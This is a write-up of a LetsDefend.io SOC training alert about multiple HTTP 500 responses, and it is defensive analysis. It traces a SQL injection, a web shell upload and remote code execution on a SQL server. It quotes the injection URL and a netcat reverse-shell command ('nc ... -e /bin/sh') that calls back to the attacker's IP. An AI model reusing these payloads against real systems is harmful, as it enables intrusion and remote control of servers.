LetsDefend.io SOC-142 Multiple HTTP 500 Response

HTTP response is how the web-server tells you what is going on. If you get a 200 status code, that means everything went well. 301? You’re being redirected.

But 500? It usually means there is an error by the back-end server. But multiple 500 responses? That’s something worth looking at.

In this case, we’ll take a look at a case where there was multiple 500 response made on a server.

Case Details

• Event Time: April 18, 2021, 1 p.m.
• EventID : 89
• Rule: SOC142 — Multiple HTTP 500 Response
• Level: Security Analyst
• Source Address 101.32.223.119
• Source Hostname 101.32.223.119
• Destination Address 172.16.20.6
• Destination Hostname SQLServer
• Username www-data
• Request URL https://172.16.20.6/userNumber=1 AND (SELECT * FROM Users) = 1
• User Agent Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
• Device Action Allowed

Analysis

• Source address is : 101.32.223.119
• Destination Address is : 172.16.20.6
• Looking at the destination address in Endpoint Management, the target was our SQL server.
• Let’s see if the IP was flagged as malicious on VirusTotal.

Big yikes

• The IP was flagged as malicious by 5 vendors. So anything flagged as malicious by some security vendors, we should take some precaution with it.

Logs

• We can search for the source address and the destination address in the Logs Management.

mmmm i love logs.

• We see a lot of entries and if we inspect one of them, it looks like they were trying for SQL injection at :

SQL injection

• At entry 392, it seems that they managed to upload a web shell.

Uploading a webshell in php

• And for the last entry, it seems they have managed to achieve remote code execution.

Oh no RCE.

Endpoint Management

• Let’s search for the destination address.
• It is indeed our SQL server. Let’s look at the command history.

• If we look for the entries at time 13:01 until 13:05, these looks fishy.
• If you don’t know, nc is the command for netcat. Netcat is a networking utility to establish TCP or UDP connections.

nc 101.32.223.119 1234 -e /bin/sh

• So it’s connecting to the source address on port 1234 and -e /bin/sh where sh is a shell.

-e filename  specify filename to exec after connect (use with caution).

• Now let’s see if they were any network connections made to that IP.

Uh oh they connected.

• Looks like it indeed connected to the IP, so our SQL server was compromised.
• Let’s look now at process to see if they started any weird process other than the netcat connection.

Deleting an antivirus signature?

• I’m not sure what its deleting, but I know for sure clamav is free and open source anti-virus program usually used in Linux. Deleting it is a bit suspicious.

Final Verdict

• From all the evidence we see and collected, we can confirm that an attacker leveraged a SQL injection vulnerability on the SQL server to compromise the server. The threat actor managed to use the vulnerability to upload a web shell where the actor was able to perform remote code execution on the server. This leads to the compromise of the server. This is a true positive.